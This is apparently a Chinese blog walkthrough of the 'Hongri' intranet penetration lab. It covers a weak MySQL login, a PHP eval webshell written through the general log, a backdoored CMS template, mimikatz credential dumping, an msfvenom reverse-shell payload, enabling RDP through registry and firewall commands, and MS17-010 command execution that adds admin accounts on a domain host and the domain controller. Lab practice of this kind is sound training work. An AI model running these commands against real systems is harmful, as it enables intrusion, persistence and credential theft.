红日内网靶场1

1.环境搭建

参考以下文章,不做过多叙述

<https://blog.csdn.net/m0_46363249/article/details/121441832

2.拓扑图和机器信息

img

image-20241208122350101

3.打点

端口扫描发现80站点和3306mysql服务

image-20241208142541944

访问http发现phpstudy探针

image-20241208142628629

使用hydra发现无法连接

image-20241208142912387

截包尝试爆破发现一个异常长度

image-20241208143525512

返回包看不出什么,到web界面手动输入root,root发现连接正常说明存在弱口令root/root

image-20241208143542310

尝试连接发现不允许从外部连接

image-20241208143801745

掏出82年的笔记,按理说phpstudy搭建应该有phpadmin

image-20241208143857821

访问路径发现的确存在

image-20241208143958943

使用弱口令root/root成功进入

image-20241208144044408

发现是能够执行sql语句的

image-20241208144514164

接下来我们尝试利用mysql 写入webshell

1
2
3
4
5
6
7
8

#mysql写入webshell需要的条件
1.mysql用户为root或dba赋权较高用户
2.有写入权限(FILE)
3.知道网站的绝对路径
4.服务器配置secure_file_priv
该选项为空代表可以写入任何目录
该选项如果有目录则代表只允许写入该目录下文件
该选项为null代表没有权限

查询"secure_file_priv"

image-20241208144950595

发现为null就是没有写入权限

image-20241208145019777

查询一下日志功能,尝试利用日志getshell

image-20241208151454482

关闭了但是我们可以手动开启,输入sql语句SET GLOBAL general_log = ON;执行成功开启

image-20241208151634306

我这里偷窥了一下站点目录,这个应该记住!

image-20241208151917953

接下来的思路是设置日志文件写到一个php文件中,SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php';

image-20241208160931473

1
2

#这里前面不能加@
select '<?php eval($_POST[gucheng]);?>';

image-20241208161435113

image-20241208162418255

进来后发现还有个网站yxcms,我们练习都打一下

image-20241208164539137

棱洞扫了下发现这cms就叫这个

image-20241208165056769

查看网页源代码发现默认口令

image-20241208165525343

到指定路径输入默认口令成功登入,修改模版index_index.php

image-20241208170152404

写入一句马

image-20241208170701742

蚁剑成功连接

image-20241208170809940

4.内网渗透

之前一直内网手渗透,下面就用cs操作了,主要是内网信息收集插件方便点

将生成马上传到站点目录下运行上线

image-20241208184123955

ladon插件 icmp检测主机存活一致

image-20241208185403956

发现存在域环境,域名为god.org

image-20241208193501834

ladon infoscan整个网段确实如此

image-20241208193607344

现在是administrator权限,可以尝试提到system权限

image-20241208194301195

上传个nc到c:\windows\temp目录

image-20241208194237316

弹过来没反应

image-20241208200518356

mimikatz抓取到密码

image-20241208200318243

尝试用psexec连接也不行

image-20241208202630995

查看一下系统信息,打了什么补丁

image-20241208202537197

使用梼杌中的ms14-058提权成功

image-20241208204847821

image-20241208202805154

上面搞的好像是有点问题,Windows应该是3389远程桌面连接,重新搞下

执行netstat -ano未发现3389端口开启

image-20241209133742373

1
2
3
4
5
6

通过以下命令查询注册表来查看 RDP 服务是否开启:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections    
# 查看RDP服务是否开启: 1关闭, 0开启 

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ WinStations\RDP-Tcp" /v PortNumber    # 查看 RDP 服务的端口

为1关闭

image-20241209135458399

使用命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f手动开启

为0成功开启

image-20241209135700721

再使用命令配置一下防火墙允许连接

1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

image-20241209141144583

接下来可以使用kali自带的xfreerdp进行连接,我这里为了后期渗透方便选择msf的

先使用msfvenom组件生成一个马

1

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.128 lport=4444 -f exe -o /root/Desktop/shell.exe

传上去执行后拿到meterpreter会话

image-20241209143251537

image-20241209143532781

提权到system

image-20241209143942740

1
2
3

run post/windows/manage/enable_rdp #开启远程桌面
会生成一个文件,该文件可用来 再关闭远程桌面
run multi_console_command -r 文件地址

接下来做域内信息收集准备横向

输入net view发现另外两台主机

image-20241209132456126

image-20241209153323049

汇总一下信息

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

域名:god.org
域控:OWA
域内用户三个:
Administrator
ligang
liukaifeng01
域内主机三台:
STU1(win7) 192.168.52.143
OWA 192.168.52.138
ROOT-TVI862UBEH 192.168.52.141

4.1 使用proxychains代理:

添加内网路由 run autoroute -s 192.168.52.0/24,查看一下arp缓存表存在52网段

image-20241209154407675

background返回一下,使用socks代理模块

1
2
3
4
5
6
7
8

msf6 auxiliary(server/socks_proxy) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > set username admin
username => admin
msf6 auxiliary(server/socks_proxy) > set password admin
msf6 auxiliary(server/socks_proxy) > run

重新开个终端vim /etc/proxychains.conf,如下配置

image-20241209162027957

返回msf6,输入proxychains curl http://192.168.52.143/yxcms/index.php,测试可以成功访问192.168.52.0网段

image-20241209162205894

4.2 CS直接建立socks5代理

右键点击机器->代理转发->socks代理,发现是62549端口

image-20241209162347235

proxifier检测成功,还是这个更方便点

image-20241209162500913

再在代理规则选择刚才那个即可

image-20241209163321746

image-20241209163352580

4.3 渗透同域主机192.168.52.141

proxychains nmap -Pn 192.168.52.141

image-20241209164251738

通过445smb端口检测操作系统为Windows server2003,proxychains nmap -sV 192.168.52.141 -p 445

image-20241209164513076

搜了一下2003全是永恒之蓝

image-20241209165028841

先用第三个模块检测一下

image-20241209170232546

直接使用msf里面的攻击模块了(ms17-010)发现接收不了session,使用msf的代理之后就不能使用反向shell了,我们需要使用正向shell。

image-20241209165759224

换用这个代码执行试试use auxiliary/admin/smb/ms17_010_command

代码成功运行

image-20241209170439287

接下来执行如下命令

1
2
3
4
5
6

set command net user gucheng !@#123qwe!@# /add #添加用户
run 
set command net localgroup administrators gucheng /add #管理员权限
run 
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'		#开启rdp
run

使用rdesktop连接proxychains rdesktop 192.168.52.141

image-20241209171859855

连接成功

image-20241209171919145

msf设置正反向shell都打不通不知道为啥,登个远程桌面算了

4.4 打域控

扫描端口,发现445又开启了

image-20241209182152367

接下来执行如下命令

1
2
3
4
5
6
7
8

set command net user gucheng2 !@#123qwe!@# /add #添加用户
run 
set command net localgroup administrators gucheng2 /add #管理员权限
run 
set command netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow		#开启防火墙端口
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'		#开启rdp
run

创建成功

image-20241209180926400

proxychains rdesktop 192.168.52.138 发现连接不了,端口filtered,裂开,这个msf的模块打不通不知道啥原因,以后再研究艹

image-20241209183526997

© 2024 - 2025 gucheNg
使用 Hugo 构建
主题 StackJimmy 设计